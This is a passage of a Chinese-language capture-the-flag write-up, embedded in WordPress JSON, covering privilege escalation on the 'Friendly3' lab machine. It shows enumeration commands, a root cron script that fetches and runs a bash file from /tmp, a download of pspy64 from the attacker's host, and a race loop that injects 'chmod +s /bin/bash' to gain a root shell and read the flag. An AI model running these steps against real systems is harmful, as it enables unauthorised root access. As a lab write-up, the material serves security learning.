u2800\u2800\u2800\u2800\u2800\u2847\u2800\u2800\u2800\u2800\u2800\u2880\u28c0\u2860\u2814\u2812\u2812\u2802\u2800\u2808\u2800\u2847\u28ff\n\u28ff\u2800\u28b8\u2800\u2800\u2800\u2880\u28c0\u2860\u280b\u2813\u2824\u28c0\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2804\u2800\u2800\u2800\u2800\u2800\u2800\u2808\u2822\u2824\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u28a0\u2800\u2800\u2800\u2860\u2800\u2847\u28ff\n\u28ff\u2840\u2818\u2800\u2800\u2800\u2800\u2800\u2818\u2844\u2800\u2800\u2800\u2808\u2811\u2866\u2884\u28c0\u2800\u2800\u2810\u2812\u2801\u28b8\u2800\u2800\u2820\u2812\u2804\u2800\u2800\u2800\u2800\u2800\u2880\u2807\u2800\u28c0\u2840\u2800\u2800\u2880\u28be\u2846\u2800\u2808\u2840\u280e\u28f8\u28ff\n\u28ff\u28ff\u28c4\u2848\u2822\u2800\u2800\u2800\u2800\u2818\u28f6\u28c4\u2840\u2800\u2800\u2847\u2800\u2800\u2808\u2809\u2812\u2822\u2864\u28c0\u2840\u2800\u2800\u2800\u2800\u2800\u2810\u2826\u2824\u2812\u2801\u2800\u2800\u2800\u2800\u28c0\u28b4\u2801\u2800\u28b7\u2800\u2800\u2800\u28b0\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28c7\u2802\u2800\u2800\u2800\u2800\u2808\u2882\u2800\u2808\u2839\u2867\u28c0\u2800\u2800\u2800\u2800\u2800\u2847\u2800\u2800\u2809\u2809\u2809\u28b1\u2812\u2812\u2812\u2812\u2896\u2812\u2812\u2802\u2819\u280f\u2800\u2818\u2840\u2800\u28b8\u2800\u2800\u2800\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28e7\u2800\u2800\u2800\u2800\u2800\u2800\u2811\u2804\u2830\u2800\u2800\u2801\u2810\u2832\u28e4\u28f4\u28c4\u2840\u2800\u2800\u2800\u2800\u28b8\u2800\u2800\u2800\u2800\u28b8\u2800\u2800\u2800\u2800\u28a0\u2800\u28e0\u28f7\u28f6\u28ff\u2800\u2800\u28b0\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28e7\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2801\u2880\u2800\u2800\u2800\u2800\u2800\u2859\u280b\u2819\u2813\u2832\u28a4\u28e4\u28f7\u28e4\u28e4\u28e4\u28e4\u28fe\u28e6\u28e4\u28e4\u28f6\u28ff\u28ff\u28ff\u28ff\u285f\u28b9\u2800\u2800\u28b8\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28e7\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2811\u2800\u2884\u2800\u2870\u2801\u2800\u2800\u2800\u2800\u2800\u2808\u2809\u2801\u2808\u2809\u283b\u280b\u2809\u281b\u289b\u2809\u2809\u28b9\u2801\u2880\u2887\u280e\u2800\u2800\u28b8\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28e6\u28c0\u2808\u2822\u2884\u2849\u2802\u2804\u2840\u2800\u2808\u2812\u2822\u2804\u2800\u2880\u28c0\u28c0\u28f0\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2840\u2800\u2880\u28ce\u2800\u283c\u280a\u2800\u2800\u2800\u2818\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28c4\u2840\u2809\u2822\u2884\u2848\u2811\u2822\u2884\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2801\u2800\u2800\u2880\u2800\u2800\u2800\u2800\u2800\u28bb\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28e6\u28c0\u2848\u2811\u2822\u2884\u2840\u2808\u2811\u2812\u2824\u2804\u28c0\u28c0\u2800\u2809\u2809\u2809\u2809\u2800\u2800\u2800\u28c0\u2840\u2824\u2802\u2801\u2800\u2880\u2806\u2800\u2800\u28b8\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28e6\u28c4\u2840\u2801\u2809\u2812\u2802\u2824\u2824\u28c0\u28c0\u28c9\u2849\u2809\u2809\u2809\u2809\u2880\u28c0\u28c0\u2860\u2824\u2812\u2808\u2800\u2800\u2800\u2800\u28f8\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28f6\u28e4\u28c4\u28c0\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28f0\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f6\u28f6\u28f6\u28f6\u28e4\u28e4\u28e4\u28e4\u28c0\u28c0\u28e4\u28e4\u28e4\u28f6\u28fe\u28ff\u28ff\u28ff\u28ff\u28ff\njuan@friendly3:\/home\/blue$ cat \/home\/juan\/ftp\/fold5\/yt.txt\nThanks to all my YT subscribers!<\/code><\/pre>\n\u501f\u7740\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
juan@friendly3:\/home\/blue$ sudo -l\n-bash: sudo: command not found\njuan@friendly3:\/home\/blue$ cd \/\njuan@friendly3:\/$ ls -la\ntotal 68\ndrwxr-xr-x 18 root root 4096 Jun 25 2023 .\ndrwxr-xr-x 18 root root 4096 Jun 25 2023 ..\nlrwxrwxrwx 1 root root 7 Jun 25 2023 bin -> usr\/bin\ndrwxr-xr-x 3 root root 4096 Jun 25 2023 boot\ndrwxr-xr-x 17 root root 3300 Apr 14 05:34 dev\ndrwxr-xr-x 63 root root 4096 Apr 14 05:34 etc\ndrwxr-xr-x 4 root root 4096 Jun 25 2023 home\nlrwxrwxrwx 1 root root 29 Jun 25 2023 initrd.img -> boot\/initrd.img-6.1.0-9-amd64\nlrwxrwxrwx 1 root root 29 Jun 25 2023 initrd.img.old -> boot\/initrd.img-6.1.0-9-amd64\nlrwxrwxrwx 1 root root 7 Jun 25 2023 lib -> usr\/lib\nlrwxrwxrwx 1 root root 9 Jun 25 2023 lib32 -> usr\/lib32\nlrwxrwxrwx 1 root root 9 Jun 25 2023 lib64 -> usr\/lib64\nlrwxrwxrwx 1 root root 10 Jun 25 2023 libx32 -> usr\/libx32\ndrwx------ 2 root root 16384 Jun 25 2023 lost+found\ndrwxr-xr-x 3 root root 4096 Jun 25 2023 media\ndrwxr-xr-x 2 root root 4096 Jun 25 2023 mnt\ndrwxr-xr-x 2 root root 4096 Jun 25 2023 opt\ndr-xr-xr-x 140 root root 0 Apr 14 05:33 proc\ndrwx------ 4 root root 4096 Jul 17 2023 root\ndrwxr-xr-x 17 root root 540 Apr 14 06:04 run\nlrwxrwxrwx 1 root root 8 Jun 25 2023 sbin -> usr\/sbin\ndrwxr-xr-x 3 root root 4096 Jun 25 2023 srv\ndr-xr-xr-x 13 root root 0 Apr 14 05:33 sys\ndrwxrwxrwt 7 root root 4096 Apr 14 06:09 tmp\ndrwxr-xr-x 14 root root 4096 Jun 25 2023 usr\ndrwxr-xr-x 12 root root 4096 Jun 25 2023 var\nlrwxrwxrwx 1 root root 26 Jun 25 2023 vmlinuz -> boot\/vmlinuz-6.1.0-9-amd64\nlrwxrwxrwx 1 root root 26 Jun 25 2023 vmlinuz.old -> boot\/vmlinuz-6.1.0-9-amd64\njuan@friendly3:\/$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.daily; }\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.weekly; }\n52 6 1 * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.monthly; }\n#\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\njuan@friendly3:\/$ cd opt\njuan@friendly3:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x 2 root root 4096 Jun 25 2023 .\ndrwxr-xr-x 18 root root 4096 Jun 25 2023 ..\n-rwxr-xr-x 1 root root 190 Jun 25 2023 check_for_install.sh\njuan@friendly3:\/opt$ cat check_for_install.sh \n#!\/bin\/bash\n\n\/usr\/bin\/curl "http:\/\/127.0.0.1\/9842734723948024.bash" > \/tmp\/a.bash\n\nchmod +x \/tmp\/a.bash\nchmod +r \/tmp\/a.bash\nchmod +w \/tmp\/a.bash\n\n\/bin\/bash \/tmp\/a.bash\n\nrm -rf \/tmp\/a.bash\njuan@friendly3:\/opt$ cd \/tmp\njuan@friendly3:\/tmp$ wget http:\/\/172.20.10.8:8888\/pspy64\n-bash: wget: command not found\njuan@friendly3:\/tmp$ busybox wget http:\/\/172.20.10.8:8888\/pspy64\nConnecting to 172.20.10.8:8888 (172.20.10.8:8888)\nsaving to 'pspy64'\npspy64 100% |***********************************************************************| 4364k 0:00:00 ETA\n'pspy64' saved\njuan@friendly3:\/tmp$ chmod +x pspy64\njuan@friendly3:\/tmp$ .\/pspy64<\/code><\/pre>\n\u770b\u5230\u4e86\u4e00\u4e2a\u7591\u4f3c\u53ef\u4ee5\u5229\u7528\u7684\u811a\u672c\uff0c\u4f20\u4e00\u4e2apspy64\u4e0a\u53bb\uff0c\u770b\u770b\u662f\u5426\u662f\u5b9a\u65f6\u4efb\u52a1\uff1a<\/p>\n
<\/div><\/p>\n\u786e\u5b9e\u662f\u5b9a\u65f6\u4efb\u52a1\uff0c\u5c1d\u8bd5\u89c1\u7f1d\u63d2\u9488\u5199\u4e2a\u811a\u672c\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n
#!\/bin\/sh\nwhile true:\ndo\necho "chmod + s \/bin\/bash" >> a.bash\ndone<\/code><\/pre>\njuan@friendly3:\/tmp$ .\/exp.sh \n.\/exp.sh: line 1: 1:: command not found<\/code><\/pre>\nwhat?\u76f4\u63a5\u6267\u884c\u5427\u3002\u3002\u3002\u3002\u3002<\/p>\n
while true;do echo 'chmod +s \/bin\/bash' >> a.bash;done<\/code><\/pre>\n\u62ff\u5230shell\uff01\uff01<\/p>\n
juan@friendly3:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1265648 Apr 23 2023 \/bin\/bash\njuan@friendly3:\/tmp$ while true;do echo 'chmod +s \/bin\/bash' >> a.bash;done\n^Cchmod +s \/bin\/bash\njuan@friendly3:\/tmp$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1265648 Apr 23 2023 \/bin\/bash\njuan@friendly3:\/tmp$ bash -p\nbash-5.2# cd \/root\nbash-5.2# ls -la\ntotal 40\ndrwx------ 4 root root 4096 Jul 17 2023 .\ndrwxr-xr-x 18 root root 4096 Jun 25 2023 ..\nlrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc\n-r-xr-xr-x 1 root root 509 Jun 25 2023 interfaces.sh\n-rw------- 1 root root 20 Jun 25 2023 .lesshst\ndrwxr-xr-x 3 root root 4096 Jun 25 2023 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-r-------- 1 root root 33 Jul 17 2023 root.txt\n-rw-r--r-- 1 root root 66 Jun 25 2023 .selected_editor\ndrwx------ 2 root root 4096 Jun 25 2023 .ssh\nbash-5.2# cat root.txt \neb9748b67f25e6bd202e5fa25f534d51<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"Friendly3 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.5 — -A Open […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-556","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/556","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=556"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/556\/revisions"}],"predecessor-version":[{"id":557,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/556\/revisions\/557"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=556"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=556"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=556"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240414180140784\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141830127.png\")
<\/div><\/p>\n![\"image-20240414180420738\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141830128.png\")
<\/div><\/p>\n![\"image-20240414180453741\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141830129.png\")
<\/div><\/p>\n![\"image-20240414181521630\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141830130.png\")
<\/div><\/p>\n